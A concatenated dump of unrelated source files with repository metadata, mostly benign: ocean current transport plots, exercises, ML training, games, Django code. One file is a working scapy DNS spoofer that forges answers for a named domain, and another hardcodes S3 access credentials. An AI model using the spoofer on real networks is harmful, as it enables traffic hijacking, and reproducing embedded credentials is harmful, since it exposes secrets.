# for i, d in enumerate(daily.date):
# thissal=daily.salinity[j,:,i]
# nanind=~isnan(thissal)
# if sum(nanind)==0:
# maxdepth.iloc[i,j]=nan
# elif sum((thissal[nanind]>which))==0:
# maxdepth.iloc[i,j]=max(daily.depth[nanind])
# else:
# maxdepth.iloc[i,j]=float(daily.depth[nanind][(thissal[nanind]>which)].min())
#
# maxdepth=maxdepth.astype('float')
# return maxdepth
#
#
# max34depth=find_isohaline(34)
# max348depth=find_isohaline(34.8)
#
# colors=pal.cubehelix.perceptual_rainbow_16.get_mpl_colormap()
#
# fig, ax = plt.subplots(1)
# fig.set_size_inches(12,4)
# max34depth.plot(ax=ax, cmap=colors, alpha=0.5,label=False)
# g=max34depth.resample('M',closed='right').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2)
# legend(loc=(1.05,0))
# gca().invert_yaxis()
# title('Depth of 34 isohaline along CF array')
# savefig('../figures/isohalines/34tseries.png')
#
# fig, ax = plt.subplots(1)
# fig.set_size_inches(12,4)
# max348depth.plot(ax=ax, cmap=colors, alpha=0.5,label=False)
# num=max348depth.resample('M').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2)
# num.legend(loc=(1.05,0))
# gca().invert_yaxis()
# title('Depth of 34.8 isohaline along CF array')
# savefig('../figures/isohalines/348tseries.png')
#
# fig, ax = plt.subplots(1)
# fig.set_size_inches(12,4)
# num=max34depth.resample('M').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2,linestyle='--')
# max348depth.resample('M').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2)
# num.legend(loc=(1.05,0))
# title('Depths of 34 and 34.8 isohalines along CF array')
# gca().invert_yaxis()
# savefig('../figures/isohalines/34and348tseries.png')
#################################################################################
### Look at velocity magnitudes at different moorings
#################################################################################
figure(figsize=(14,3))
for rr in range(3):
plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],alpha=0.5,label='CF'+str(rr+1))
plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean').min(dim='depth')[rr])
legend(loc=(1.05,0))
plot(daily.date,0.15*daily['across track velocity'].min(dim='depth')[0],'k')
savefig('../figures/minvels/CF1-2.png')
figure(figsize=(14,3))
for rr in range(1,3):
plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],alpha=0.75,label='CF'+str(rr+1))
# plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean').min(dim='depth')[rr])
legend(loc=(1.05,0.2))
title('CF2 and 3 track each other closely')
savefig('../figures/minvels/CF2-3.png')
for rr in range(8):
figure(figsize=(14,3))
# plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],alpha=0.5,label='CF'+str(rr+1))
plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean').min(dim='depth')[rr],label='min vel')
title('CF'+str(rr+1))
plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean')[rr,0,:],label='surface vel')
legend(loc=(1.05,0.2))
ylabel('velocity (m/s)')
savefig('../figures/velstats/CF'+str(rr+1)+'_minvelcomp_monthly.png',bbox_inches='tight')
for rr in range(8):
figure(figsize=(14,3))
plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],label='min vel')
axhline(0)
title('CF'+str(rr+1))
plot(daily.date,daily['across track velocity'][rr,0,:],label='surface vel')
legend(loc=(1.05,0.2))
ylabel('velocity (m/s)')
savefig('../figures/velstats/CF'+str(rr+1)+'_minvelcomp_daily.png',bbox_inches='tight')
daily.dims
figure(figsize=(14,3))
for rr in range(8):
plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean')[rr,0,:],label='CF'+str(rr+1))
legend(loc=(1.05,0.2))
savefig('../figures/velstats/Monthlyave_surf_all.png')
#################################################################################
# Transport -- define as solely at CF1 for now
#################################################################################
mid_dist=hstack((12,(diff(daily.distance)[:-1]+diff(daily.distance)[1:])/2,17))
middistmat=transpose((tile(mid_dist,[len(daily.depth)-1,len(daily.date),1])),(2,0,1))
depthdiffmat=transpose((tile(diff(daily.depth),[len(daily.distance),len(daily.date),1])),(0,2,1))
shape(middistmat[:,:,:])
cf1vel=daily['across track velocity'][0,:-1,:]
cctrans=(cf1vel*depthdiffmat[0,:,:]*middistmat[0,:,:]/1e3).sum('depth')
cctrans_sal=(daily.where(daily.salinity<34)['across track velocity'][0,:-1,:]*depthdiffmat[0,:,:]*middistmat[0,:,:]/1e3).sum('depth')
cctrans.plot(figsize=(12,3),label='Full CF1 water column')
axhline(0)
cctrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
cctrans_sal.plot(label='Fresher than 34 at CF1')
legend()
ylabel('Transport (Sv)')
title('Transport at CF1 (EGCC)')
savefig('../figures/trans/CF1trans.png')
cctrans_scaled=cctrans*3
cctrans.plot(figsize=(12,3),label='')
axhline(0)
cctrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
# cctrans_sal.plot(label='Fresher than 34 at CF1')
legend()
ylabel('[Sv]')
title('EG Coastal Current transport')
savefig('../figures/trans/EGCC_trans.pdf')
cctrans.resample('W',how='mean',dim='date').plot(figsize=(12,3))
EGtottrans=(daily['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
EGtottrans_vel=(daily.where(daily['across track velocity']<0)['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
EGtottrans.plot(figsize=(12,3),label='Full water columns')
# axhline(0)
EGtottrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
EGtottrans_vel.plot(label='Only negative velocities')
ylabel('Transport (Sv)')
legend()
title('Transport at CF2-M1 (EGC system)')
savefig('../figures/trans/CF2-8trans.png')
egtrans=(daily.where(daily.salinity<34.8)['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
ictrans=(daily.where(daily.salinity>=34.85)['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
cctrans.plot(figsize=(12,3),label='East Greenland COASTAL Current')
egtrans.plot(label='East Greenlandic Current Waters')
# axhline(0)
# egtrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
ictrans.plot(label='Irminger Current')
ylabel('Transport (Sv)')
legend()
title('EGC system transports')
savefig('../figures/trans/EGsystem_trans.png')
egtrans.plot(figsize=(12,3),label='East Greenlandic Current Waters')
axhline(0)
egtrans.resample('M',how='mean',dim='date').plot(linewidth=2)
ylabel('[Sv]')
title('East Greenlandic Current transport')
savefig('../figures/trans/EGC_trans.png')
savefig('../figures/trans/EGC_trans.pdf')
figure()
egtrans.plot(figsize=(12,3),alpha=0.5,label='')
egtrans.resample('M',dim='date',how='mean').plot(linewidth=2,color='b',label='East Greenland Current')
cctrans_scaled.plot(alpha=0.5,label='')
cctrans_scaled.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange',label='Coastal Current (x 3)')
title('Transport in the EGC system')
ylabel('[Sv]')
legend()
savefig('../figures/trans/EGCboth_trans.png')
savefig('../figures/trans/EGCboth_trans.pdf',bbox_inches='tight')
ictrans.plot(figsize=(12,3))
ictrans.resample('M',how='mean',dim='date').plot(linewidth=2)
ylabel('Transport (Sv)')
title('Irminger Current transport')
savefig('../figures/trans/IC_trans.png')
hexbin(daily.salinity.values.flatten(),daily.temperature.values.flatten(),bins='log',cmap=cm.hot_r)
axvline(34.8,color='k')
colorbar(label='[log of number of measurements]')
ylabel('potential temperature [$^\circ$ C]')
xlabel('salinity')
title('Separation of Polar and Atlantic Water at 34.8')
savefig('../figures/trans/TS_separation.png')
savefig('../figures/trans/TS_separation.pdf',bbox_inches='tight')
#################################################################################
###################### Freshwater transport #####################################
#################################################################################
srefa=34
srefb=34.8
ccfresh=(cf1vel*(daily.salinity[0,:-1,:]-srefa)/srefa*depthdiffmat[0,:,:]*middistmat[0,:,:]).sum('depth')
ccfresh_refb=(cf1vel*(daily.salinity[0,:-1,:]-srefb)/srefb*depthdiffmat[0,:,:]*middistmat[0,:,:]).sum('depth')
ccfresh_scaled=ccfresh*2
figure()
ccfresh.plot(figsize=(12,3),color='orange')
ccfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange')
title('Freshwater transport in the EGCC referenced to 34')
ylabel('mSv')
savefig('../figures/trans/CC_fresh.png')
figure()
ccfresh_refb.plot(figsize=(12,3),color='orange')
ccfresh_refb.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange')
title('Freshwater transport in the referenced to 35')
ylabel('mSv')
savefig('../figures/trans/CC_fresh_refb.png')
egfresh=(daily.where(daily.salinity<34.85)['across track velocity'][1:,:-1,:]*(daily.where(daily.salinity<34.85)['salinity'][1:,:-1,:]-srefb)/srefb*depthdiffmat[1:,:,:]*middistmat[1:,:,:]).sum('distance').sum('depth')
figure()
egfresh.plot(figsize=(12,3))
egfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='b')
title('Freshwater transport in the EGC')
ylabel('mSv')
savefig('../figures/trans/EGC_fresh.png')
figure()
egfresh.plot(figsize=(12,3),alpha=0.5)
egfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='b',label='East Greenland Current')
ccfresh_scaled.plot(alpha=0.5)
ccfresh_scaled.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange',label='Coastal Current (x 2)')
title('Freshwater transport in the EGC system')
ylabel('mSv')
legend()
savefig('../figures/trans/EGCboth_fresh.png')
savefig('../figures/trans/EGCboth_fresh.pdf',bbox_inches='tight')
icfresh=(daily.where(daily.salinity>=34.85)['across track velocity'][1:,:-1,:]*(daily.where(daily.salinity>=34.85)['salinity'][1:,:-1,:]-srefb)/srefb*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
icfresh.plot(figsize=(12,3))
icfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='b')
title('Freshwater transport in the IC')
ylabel('mSv')
| [
"isabela.lebras@gmail.com"
] | isabela.lebras@gmail.com |
86310a44fc70e194901cd6f6ed1921448a4e2d40 | 789fe602dbd2d36fcd42cfd729758790a526055d | /numpy_linear_algebra.py | 3b0434f43c5aa188e8ec536ca12d2b80dd62f544 | [] | no_license | charukhandelwal/Hackerrank | 604b6be1b11c718b9c99e4a3eae9544ff629576d | 8ac84c481804d5b7a00fffc566312037ccb00685 | refs/heads/master | 2022-12-29T01:12:11.247527 | 2020-10-17T17:10:50 | 2020-10-17T17:10:50 | 304,927,588 | 1 | 0 | null | 2020-10-17T17:10:51 | 2020-10-17T17:03:23 | null | UTF-8 | Python | false | false | 1,413 | py | """
Problem Statement
The NumPy module also comes with a number of built-in routines for linear algebra calculations. These can be found in the sub-module linalg.
linalg.det
The linalg.det tool computes the determinant of an array.
print numpy.linalg.det([[1 , 2], [2, 1]]) #Output : -3.0
linalg.eig
The linalg.eig computes the eigenvalues and right eigenvectors of a square array.
vals, vecs = numpy.linalg.eig([[1 , 2], [2, 1]])
print vals #Output : [ 3. -1.]
print vecs #Output : [[ 0.70710678 -0.70710678]
# [ 0.70710678 0.70710678]]
linalg.inv
The linalg.inv tool computes the (multiplicative) inverse of a matrix.
print numpy.linalg.inv([[1 , 2], [2, 1]]) #Output : [[-0.33333333 0.66666667]
# [ 0.66666667 -0.33333333]]
Other routines can be found here
Task
You are given a square matrix A with dimensions NXN. Your task is to find the determinant.
Input Format
The first line contains the integer N.
The next N lines contains the N space separated elements of array A.
Output Format
Print the determinant of A.
Sample Input
2
1.1 1.1
1.1 1.1
Sample Output
0.0
"""
import numpy
N = input()
A = numpy.array([map(float,raw_input().split()) for _ in xrange(N)])
print numpy.linalg.det(A) | [
"ayush.aceit@gmail.com"
] | ayush.aceit@gmail.com |
38996b3c70652eed0b025f1537a8abd67f8b6ed9 | bf12774c91bbad9dfcd887d89d78b2857f56d776 | /tests3.py | 6196867003d3c54b007209bd4ea23375faf91025 | [
"MIT"
] | permissive | tachijuan/python | d91a0fe0224a8801078776661caeab535fed80a7 | b4b9e9ce75b5e8426af9df41427fff659ff0cc60 | refs/heads/master | 2020-03-29T23:02:13.334929 | 2015-08-27T15:59:34 | 2015-08-27T15:59:34 | 27,557,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | import boto
import boto.s3.connection
ak = 'c3BlY3RyYQ=='
sk = 'bjQpZe2b'
c = boto.connect_s3(aws_access_key_id = ak, aws_secret_access_key = sk, host = '10.10.1.237',
is_secure=False, calling_format = boto.s3.connection.OrdinaryCallingFormat())
print c
for b in c.get_all_buckets():
print "%s\t%s" % (b.name,b.creation_date)
| [
"juan@orlandini.us"
] | juan@orlandini.us |
3174910891906b633e4d6ffa38df2cf3f8d72564 | b8ef2769bf6d9159457faa642f57c91a01533ef0 | /5 dns_spoof/dns-spoofer-sivet.py | b88f75539ed0dc823dd8078fe64ea44669d2036d | [] | no_license | C-BOE86/Python-Ethical-Hacking-Tools | 096d9252096536164a18c6449d105d3807415e51 | 0ca3dd29bc35722e8e6a55a2a6d56036dccb856b | refs/heads/master | 2022-03-23T04:29:30.215390 | 2019-12-03T19:57:57 | 2019-12-03T19:57:57 | 198,090,999 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | #!/usr/bin/python2
#capture the request packet from client and save to a queue using iptables and alter send or recieve modified packet
#convert the raw packet to scapy packet to modify the request
import netfilterqueue
import scapy.all as scapy
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
if "sivet.in" in qname:
print "[+] Spoofing Target "
answer = scapy.DNSRR(rrname=qname,rdata="127.0.0.1")
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
packet.set_payload(str(scapy_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0,process_packet)
queue.run()
| [
"noreply@github.com"
] | C-BOE86.noreply@github.com |
e10a899ea0e195ad55ab677dbc9616a9e3f64832 | f72fa4432e6abb742cbf1c61c580db1ed688a311 | /day27/s21crm/crm/forms/school.py | c8e42b166247fd56e11cee8ef0a4b0e7def14cb2 | [] | no_license | huningfei/python | 7ddc9da14a3e53ad1c98fc48edd1697a6f8fc4f7 | 9ca1f57f2ef5d77e3bb52d70ac9a241b8cde54d2 | refs/heads/master | 2022-10-31T18:56:33.894302 | 2019-01-04T11:06:59 | 2019-01-04T11:06:59 | 128,178,516 | 2 | 1 | null | 2022-10-12T19:26:04 | 2018-04-05T08:25:32 | Python | UTF-8 | Python | false | false | 401 | py | from django import forms
from crm import models
class SchoolModelForm(forms.ModelForm):
class Meta:
model = models.School # 这里前面的model一定不要写models
fields = '__all__'
error_messages = {
'title': {'required': '学校不能为空'}
}
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'})
}
| [
"huningfei@126.com"
] | huningfei@126.com |
83a81d4031b4d0b27fc071ab22e653d8499b1881 | 948326722b8ff0cda1a06ea8485e0871033ede92 | /Chapter06/rnai.py | cc8415c23405e19fc19775abf0dc03846ebe5fa2 | [
"MIT"
] | permissive | peastman/DeepLearningLifeSciences | 0bd3caf1f1d4fc9b585daec39d859b33f8be60e9 | 3de61733433c3a214c4ddd116bc1c785f9e49674 | refs/heads/master | 2021-06-18T17:01:00.827567 | 2021-04-20T17:20:33 | 2021-04-20T17:20:33 | 206,670,326 | 0 | 0 | MIT | 2019-09-05T22:53:01 | 2019-09-05T22:53:00 | null | UTF-8 | Python | false | false | 1,130 | py | # Train a model to predict how well sequences will work for RNA interference.
import deepchem as dc
import tensorflow as tf
import tensorflow.keras.layers as layers
import matplotlib.pyplot as plot
# Build the model.
features = tf.keras.Input(shape=(21, 4))
prev = features
for i in range(2):
prev = layers.Conv1D(filters=10, kernel_size=10, activation=tf.nn.relu, padding='same')(prev)
prev = layers.Dropout(rate=0.3)(prev)
output = layers.Dense(units=1, activation=tf.math.sigmoid)(layers.Flatten()(prev))
keras_model = tf.keras.Model(inputs=features, outputs=output)
model = dc.models.KerasModel(
keras_model,
loss=dc.models.losses.L2Loss(),
batch_size=1000,
model_dir='rnai')
# Load the data.
train = dc.data.DiskDataset('train_siRNA')
valid = dc.data.DiskDataset('valid_siRNA')
# Train the model, tracking its performance on the training and validation datasets.
metric = dc.metrics.Metric(dc.metrics.pearsonr, mode='regression')
for i in range(20):
model.fit(train, nb_epoch=10)
print(model.evaluate(train, [metric])['pearsonr'])
print(model.evaluate(valid, [metric])['pearsonr'])
| [
"peastman@stanford.edu"
] | peastman@stanford.edu |
c097c3802eeec172bcba8191ceb9be955f182d7d | 169aa5a31e8d413b12f97b7a36a397c46cd5cbd3 | /dataUtils.py | 500bc7b59f6062758009852bc2713566df9978c1 | [] | no_license | XWQlover/tensorflow2.0-DKT-XWQ | 5d049e9db63bca598d0504fc74c4c5e37b10b3af | d99e283ed22d2c3e91196056aa897fcf6e71bd73 | refs/heads/master | 2022-12-13T06:49:18.632671 | 2020-09-17T10:02:12 | 2020-09-17T10:02:12 | 289,620,680 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,699 | py | import pandas as pd
import numpy as np
import tensorflow as tf
class AssismentData():
def __init__(self):
self.data = pd.read_csv("/content/drive/My Drive/DKT/skill_builder_data.csv")
self.data = self.data.dropna()
self.data["user_id"], _ = pd.factorize(self.data["user_id"])
self.data["skill_id"], _ = pd.factorize(self.data["skill_id"])
self.data["skills_correctness"] = self.data.apply(
lambda x: x.skill_id * 2 if x.correct == 0.0 else x.skill_id * 2 + 1, axis=1)
self.data = self.data.groupby("user_id").filter(lambda q: len(q) > 1).copy()
self.seq = self.data.groupby('user_id').apply(
lambda r: (
r["skills_correctness"].values[:-1],
r["skill_id"].values[1:],
r['correct'].values[1:]
)
)
def datasetReturn(self, shuffle=None, batch_size=32, val_data=None):
dataset = tf.data.Dataset.from_generator(lambda: self.seq, output_types=(tf.int32, tf.int32, tf.int32))
if shuffle:
dataset = dataset.shuffle(buffer_size=shuffle)
MASK_VALUE = -1
dataset = dataset.padded_batch(
batch_size=50,
padding_values=(MASK_VALUE, MASK_VALUE, MASK_VALUE),
padded_shapes=([None], [None], [None]),
drop_remainder=True
)
i = 0
for l in dataset.as_numpy_iterator():
i += 1
dataset = dataset.shuffle(buffer_size=50)
test_size = int(np.ceil(i * 0.2))
train_size = i - test_size
train_data = dataset.take(train_size)
dataset = dataset.skip(train_size)
return train_data, dataset | [
"794632026@qq.com"
] | 794632026@qq.com |
909457621a61debda7558bb9f60c2c7feb57b2d0 | 76a402b7db1432f9bf8b9605416521a4284ce1e2 | /nim_game.py | 95d3be8cab232b6f99b6eef35ff32fa60baa5ddf | [] | no_license | SuguruChhaya/nim-game | 7aa915a475d414288fbb33957cad88ec4dac0c1d | 6f345a36dc3a26ee8e5f89c139718a21b7050232 | refs/heads/master | 2022-12-13T01:30:04.352715 | 2020-09-22T23:42:51 | 2020-09-22T23:42:51 | 285,307,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,498 | py | import random
'''
Not to create objects but just to manage the methods.
'''
class MainGame():
def __init__(self, reaching_number, increment, goesfirst):
self.reaching_number = reaching_number
self.increment = increment
self.goesfirst = goesfirst
#*Keeps track of the previous numbers
self.total = 0
self.current_choice = 0
#*Finding the reaching_number - 1 number
self.ending_win_number = self.reaching_number - 1
self.follow_increment = self.increment + 1
#*Rather than making the move based on the past move, I should try to get it close to the win_number_list
self.win_number_list = []
for i in range(self.ending_win_number, 0, -1 * self.follow_increment):
self.win_number_list.append(i)
self.win_number_list = sorted(self.win_number_list)
def gotoplayerturn(self):
if self.goesfirst == '0':
self.no_input_character()
elif self.goesfirst == '1':
self.input_character()
def no_input_character(self):
#*This function os for the characters without inputs (computer, you advice)
print("\nThe computer's turn")
print(f"\nCurrent total: {self.total}")
if self.total not in self.win_number_list:
for i in self.win_number_list:
if i > self.total and i - self.total <= self.increment:
self.current_choice = i - self.total
print(f"The computer chooses: {self.current_choice}\n")
self.total += self.current_choice
#*Just in case the player knows the strategy and there is no hope to win,
#*I will pick a random int
elif self.total in self.win_number_list:
self.current_choice = random.randint(1, self.increment)
print(f"The computer chooses: {self.current_choice}\n")
self.total += self.current_choice
if self.total >= self.reaching_number:
print(f"The computer reached {self.reaching_number}.")
print("The computer loses.")
else:
self.input_character()
def input_character(self):
#*This function is for the characters with inputs (you, your friend)
not_valid = True
while not_valid:
print('\nYour turn:')
print(f"\nCurrent total: {self.total}")
print(f"Pick the increment (max:{self.increment})")
self.current_choice = input("You choose: ")
try:
self.current_choice = int(self.current_choice)
if not 1 <= self.current_choice <= self.increment:
raise(ValueError)
else:
self.total += self.current_choice
not_valid = False
if self.total >= self.reaching_number:
print(f"You reached {self.reaching_number}.")
print("You lose.")
else:
self.no_input_character()
except ValueError:
print("Enter valid command or integer.")
not_valid = True
print("\nWelcome to the nim game! \nYou will count from 1 to the reaching number. \nYou will choose the max increment and the reaching number.\nSince the computer will perform the best possible moves to win, you can use this program to beat your friends!")
not_valid = True
while not_valid:
try:
print("\nThe reaching number has to be between 20 and 100 (inclusive).")
reaching_number_str = input("Enter reaching number: ")
print("\nThe max increment has to be between 3 and 10 (inclusive).")
incement_str = input("Enter max increment: ")
reaching_number = int(reaching_number_str)
increment = int(incement_str)
not_valid = False
if (not 20 <= reaching_number <= 100) or (not 3 <= increment <= 10):
raise(ValueError)
else:
zero_player = "The computer"
one_player = "You"
goesfirst = input(f"Who goes first: 0({zero_player}) or 1({one_player})>")
if goesfirst in ['0', '1']:
game = MainGame(reaching_number, increment, goesfirst)
game.gotoplayerturn()
else:
raise (ValueError)
except ValueError:
print("Enter a valid command or integer.")
not_valid = True
| [
"suguruchhaya@gmail.com"
] | suguruchhaya@gmail.com |
6759479a9640fc8ea7ba928109da4abbb456fb4a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/25/usersdata/112/12124/submittedfiles/av1_3.py | 0b936ae903da1273501fd3e5f09c85bf73708585 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
zeta=0
tan=0
a=input('Digite o valor de a')
b=input('Digite o valor de b')
c=a%b
while a%b!=0:
if b%c!=0:
b=zeta
zeta=a
print(zeta) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
76a4888ad521d027ce01d8cbb5f9f5c5052d0f4d | ac085f74b70ffd0d7383a611c79461e13963c623 | /Disgaea 2/skill-grind-script.py | 4b5ba5c58a715572509bc21017766ef539b4e1c6 | [
"MIT"
] | permissive | NotTidduss/auto-input-scripts | 5c95fded917ffda7241faefd4526bb7b698115cb | 71800940231f149c75ff87a6a7e3ddb56e1459d3 | refs/heads/main | 2023-04-24T13:54:45.298304 | 2021-05-06T05:47:41 | 2021-05-06T05:47:41 | 348,642,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,689 | py | # Requirements:
# - Skill to grind needs adjustments in script - see !!!.
# - Characters to need to be positioned above to invincible target. I use the first invincible tile in stage 4-4.
# - Characters should have as much SP as possible
########## ------------ Key bindings ------------ ##########
STOP_SCRIPT = 'ESCAPE'
MOVE_UP = 'w'
MOVE_LEFT = 'a'
MOVE_RIGHT = 'd'
MOVE_DOWN = 's'
CONFIRM = 'k'
CANCEL = 'l'
OPEN_MENU = 'i'
WAIT = 'p'
################## Command infrastructure ##################
import keyboard
import time
class Command:
def __init__(self, key, duration, is_silence = False):
self.key = key
self.duration = duration
self.is_silence = is_silence
def execute(self):
if (self.is_silence):
print("Silence for " + str(self.duration) )
time.sleep(self.duration)
else:
print("Key " + self.key + " for " + str(self.duration) + " seconds.")
keyboard.press(self.key)
time.sleep(self.duration)
keyboard.release(self.key)
### -- Scenario to select stage, move chars and clear -- ###
# configure commands
move_up = Command(MOVE_UP, 0.1)
move_left = Command(MOVE_LEFT, 0.1)
move_right = Command(MOVE_RIGHT, 0.1)
move_down = Command(MOVE_DOWN, 0.1)
confirm = Command(CONFIRM, 0.3)
open_menu = Command(OPEN_MENU, 0.2)
wait = Command(WAIT, 6)
intermission = Command(WAIT, 0.1)
safetyCancel = Command(CANCEL, 0.1)
# set commands
commands = [
wait, # initial wait for turn
move_up, # move cursor to character
intermission,
confirm, # open character menu
move_down, # choose special menu
intermission,
move_down,
intermission,
confirm, # open special menu
move_down, # choose skill !!!
intermission,
move_down,
intermission,
move_down,
intermission,
confirm, # open skill selection
intermission,
confirm, # confirm target selection
open_menu, # open menu for END TURN
move_down,
confirm, # END TURN
wait,
safetyCancel # in case the loop gets stuck, this might fix it
]
########################## Logic ###########################
is_continue = True
STOP_EVENT = keyboard.KeyboardEvent('down', STOP_SCRIPT, STOP_SCRIPT)
def stop_script(keyboard_event):
if(keyboard_event.name == STOP_EVENT.name):
print("Goodbye.")
global is_continue
is_continue = False
if __name__ == "__main__":
global is_continue
keyboard.on_press(stop_script)
while is_continue:
for command in commands:
command.execute() | [
"nottidduss@gmail.com"
] | nottidduss@gmail.com |
61f849141c82b9fc7c57d859953c3c157e0f98be | 07f6550970166923b8ae0b5d647552e850e5acc8 | /reviewpost/migrations/0001_initial.py | 0b9f6fabc05ccf3420eb08163a28afb9ad26f83b | [] | no_license | grasshopper-dev/reviewproject | 33ed8c7ddb81d16552762ed1e06f6bed0e373633 | ef2212e88f27441ed1aa254b5c607cfd2c4c5a5b | refs/heads/main | 2023-03-13T06:21:34.385623 | 2021-03-04T00:18:07 | 2021-03-04T00:18:07 | 344,300,541 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,127 | py | # Generated by Django 3.1.6 on 2021-02-24 23:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ReviewModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('content', models.TextField()),
('images', models.ImageField(upload_to='')),
('useful_review', models.IntegerField(blank=True, default=0, null=True)),
('useful_review_record', models.TextField()),
('evaluation', models.CharField(choices=[('良い', '良い'), ('悪い', '悪い')], max_length=10)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"grasshopperdevel2019@gmail.com"
] | grasshopperdevel2019@gmail.com |
4831f524e40ae85b2eea36bd5a913cd79f31c444 | e2e903579b9167e42fe7b3fd20b294b730e14664 | /ch6/ch6note.py | de7c09c4aba9616fa3eb6242a5abbf64c0dac404 | [] | no_license | Joyounger/PythonVisualQuickStartGuide | afd97708bb06c4c5df44caea58d30920701be9ab | 3d667863aeca3f83f5f6126b3dfa549ceeda78ef | refs/heads/master | 2020-03-21T04:13:23.864747 | 2018-09-16T02:25:59 | 2018-09-16T02:27:07 | 138,097,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 565 | py |
# 负数索引,沿着从右向左的方向,用负数表示字符串中的索引
# 这时字符串的最后一个字符为s[-1]
# ord('a') 计算字符unicode编码
# chr(97) 根据编码值返回字符
# python计算字符串长度时,并不将\视为额外的字符
len('\\') # 1
len('a\nb\nc') # 5
# s.count(t) 返回t在s中出现的次数
# s.encode() 设置s的编码
# s.join(seq) 使用s将seq中的字符串连接成一个字符串
# s.maketrans(old, new) 创建一个转换表,用于将old中的字符改为new中相应的字符
| [
"942510346@qq.com"
] | 942510346@qq.com |
3ab104c3a0615fdf4f99d8cde30bb2d050d339a2 | b7136c09b98d613fe3dd93df317ec7ddd0012e7b | /src/rcarl.py | 02dd3ef4bcd1f12e27006ad7a327b0ed3501ce60 | [
"MIT"
] | permissive | fossifer/WhitePhosphorus-bot | 54d37492e500c9002d4ecb8cfabd259f3e52968c | cbb5b4e4e6667fc7b6a18f7e7dbc078722b83c7f | refs/heads/master | 2023-05-27T10:15:34.511951 | 2019-12-09T14:07:59 | 2019-12-09T14:07:59 | 83,035,902 | 1 | 0 | MIT | 2023-05-22T22:28:06 | 2017-02-24T11:43:03 | Python | UTF-8 | Python | false | false | 2,994 | py | # TODO: cache the status of titles
import datetime
from bs4 import BeautifulSoup
from . import botsite
from .core import EditQueue, check, log
from .botsite import remove_nottext, get_summary
working_title = 'Template:Recent changes article requests/list'
delay_days = 7
whitelist_title = 'User:%s/controls/rcarl/whitelist' % botsite.bot_name
whitelist = []
def load_whitelist():
global whitelist
site = botsite.Site()
text = site.get_text_by_title(whitelist_title)
# The first line and the last line are respectively <pre> and </pre>, ignoring
for line in text.splitlines()[1:-1]:
try:
index = line.index('#')
line = line[:index]
except ValueError:
pass
line = line.strip()
if not line:
continue
whitelist.append(line)
def check_create_time(site, articles, exists):
ret = [False] * len(articles)
cts = datetime.datetime.utcnow()
for i, title in enumerate(articles):
if not exists[i] or title in whitelist:
continue
r = site.api_get({'action': 'query', 'prop': 'revisions',
'rvdir': 'newer', 'rvlimit': 1, 'rvprop': 'timestamp',
'titles': title, 'converttitles': 1}, 'query')
page = r.get('pages')
create_ts = None
for k, v in page.items():
